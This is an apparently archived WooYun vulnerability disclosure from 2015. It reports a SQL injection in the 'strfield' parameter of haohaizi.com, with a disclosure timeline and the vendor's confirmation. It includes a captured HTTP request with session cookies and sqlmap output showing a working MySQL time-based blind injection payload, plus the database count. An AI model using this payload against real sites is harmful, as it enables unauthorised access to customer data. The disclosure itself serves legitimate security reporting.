乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-14: 细节已通知厂商并且等待厂商处理中 2015-06-15: 厂商已经确认,细节仅向厂商公开 2015-06-25: 细节向核心白帽子及相关领域专家公开 2015-07-05: 细节向普通白帽子公开 2015-07-15: 细节向实习白帽子公开 2015-07-30: 细节向公众公开
天地本不仁 万物为刍狗(涉及的表太多了 跑起来慢 就没跑了)
POST 数据包:
GET /article-help-getvisitororder.html?t=1434284989451&mode=3&strfield=13800138000 HTTP/1.1Host: www.haohaizi.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://www.haohaizi.com/article-help-visitororders.htmlCookie: origins=%5B%7B%22utm_source%22%3A%22linktech%22%2C%22utm_medium%22%3A%22cps%22%2C%22utm_term%22%3Anull%2C%22utm_content%22%3Anull%2C%22utm_campaign%22%3Anull%2C%22create_time%22%3A1434284937%2C%22expired_time%22%3A1435494537%2C%22other%22%3A%7B%22adid%22%3A%22shichangcps%22%2C%22cid%22%3A%221636%22%2C%22fbt%22%3A%22A100202883%7C2390474880000E%5E20150614202714-80627%7C99999%7C01%7C%22%7D%7D%5D; vary=77b9f63c97b5ce99c6d26b76c12e347726a340f2657fb48326076630b12a0082; _jzqa=1.897618466894645600.1434284871.1434284871.1434284871.1; _jzqb=1.3.10.1434284871.1; _jzqc=1; _jzqx=1.1434284871.1434284871.1.jzqsr=click%2Elinktech%2Ecn|jzqct=/.-; _jzqckmp=1; __utma=101467934.1657353480.1434284871.1434284871.1434284871.1; __utmb=101467934.2.10.1434284871; __utmc=101467934; __utmz=101467934.1434284871.1.1.utmcsr=linktech|utmccn=(not%20set)|utmcmd=cps; __utmv=101467934.|3=ADID=shichangcps=1; Hm_lvt_53a0d71dba66835ff1aa907db99144d8=1434284872; Hm_lpvt_53a0d71dba66835ff1aa907db99144d8=1434284893; Hm_lvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284875; Hm_lpvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284892; s=43d77f2b115789066d4882150043031e; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; isVisitor=1; user1=10000000; _qzja=1.1084372355.1434284871142.1434284871142.1434284871143.1434284871143.1434284891118..0.0.2.1; _qzjb=1.1434284871142.2.0.0.0; _qzjc=1; _qzjto=2.1.0; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1434284965; loginName=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; UNAME=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; MLV=1; S[MEMBER]=10000000X-Forwarded-For: 8.8.8.8'Connection: keep-alive
strfield 参数可注入(因之前我用我手机号测的 没改 所以 下面我已打码 具体参数见下图以及漏洞证明)
共 12 个数据库
GET parameter 'strfield' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 108 HTTP(s) requests:---Parameter: strfield (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: t=1434284989451&mode=3&strfield=13800138000' AND (SELECT * FROM (SELECT(SLEEP(5)))zLJp) AND 'Qxdq'='Qxdq---[20:42:48] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[20:42:48] [INFO] fetching database names
危害等级:高
漏洞Rank:10
确认时间:2015-06-15 17:20
感谢对好孩子的关注,我们会尽快修复漏洞
暂无